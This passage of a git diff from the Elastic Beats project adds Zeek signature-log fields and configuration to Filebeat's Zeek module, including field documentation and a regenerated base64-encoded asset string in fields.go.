{pull}23875[23875] @@ -861,6 +862,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Upgrade okta to ecs 1.8.0 and move js processor to ingest pipeline {issue}23118[23118] {pull}23929[23929] - Update zoom module to ECS 1.8. {pull}23904[23904] {issue}23118[23118] + *Heartbeat* - Add mime type detection for http responses. {pull}22976[22976] diff --git a/filebeat/docs/fields.asciidoc b/filebeat/docs/fields.asciidoc index bdb00d656b35..902d79382d8d 100644 --- a/filebeat/docs/fields.asciidoc +++ b/filebeat/docs/fields.asciidoc @@ -159840,6 +159840,73 @@ type: integer Height of the screen that is being shared. +type: integer + +-- + +[float] +=== signature + +Fields exported by the Zeek Signature log. + + + +*`zeek.signature.note`*:: ++ +-- +Notice associated with signature event. + + +type: keyword + +-- + +*`zeek.signature.sig_id`*:: ++ +-- +The name of the signature that matched. + + +type: keyword + +-- + +*`zeek.signature.event_msg`*:: ++ +-- +A more descriptive message of the signature-matching event. + + +type: keyword + +-- + +*`zeek.signature.sub_msg`*:: ++ +-- +Extracted payload data or extra message. + + +type: keyword + +-- + +*`zeek.signature.sig_count`*:: ++ +-- +Number of sigs, usually from summary count. + + +type: integer + +-- + +*`zeek.signature.host_count`*:: ++ +-- +Number of hosts, from a summary count. + + type: integer -- diff --git a/x-pack/filebeat/filebeat.reference.yml b/x-pack/filebeat/filebeat.reference.yml index 177184270990..db79f9abb8ce 100644 --- a/x-pack/filebeat/filebeat.reference.yml +++ b/x-pack/filebeat/filebeat.reference.yml @@ -2138,7 +2138,7 @@ filebeat.modules: http: enabled: true intel: - enabled: true + enabled: true irc: enabled: true kerberos: @@ -2161,6 +2161,8 @@ filebeat.modules: enabled: true rfb: enabled: true + signature: + enabled: true sip: enabled: true smb_cmd: diff --git a/x-pack/filebeat/module/zeek/_meta/config.yml b/x-pack/filebeat/module/zeek/_meta/config.yml index 3be38969bb48..cc4572f6874a 100644 --- a/x-pack/filebeat/module/zeek/_meta/config.yml +++ b/x-pack/filebeat/module/zeek/_meta/config.yml @@ -20,7 +20,7 @@ http: enabled: true intel: - enabled: true + enabled: true irc: enabled: true kerberos: @@ -43,6 +43,8 @@ enabled: true rfb: enabled: true + signature: + enabled: true sip: enabled: true smb_cmd: diff --git a/x-pack/filebeat/module/zeek/fields.go b/x-pack/filebeat/module/zeek/fields.go index 8154c14a5429..d048c716bf66 100644 --- a/x-pack/filebeat/module/zeek/fields.go +++ b/x-pack/filebeat/module/zeek/fields.go @@ -19,5 +19,5 @@ func init() { // AssetZeek returns asset data. // This is the base64 encoded gzipped contents of module/zeek. func AssetZeek() string { - return "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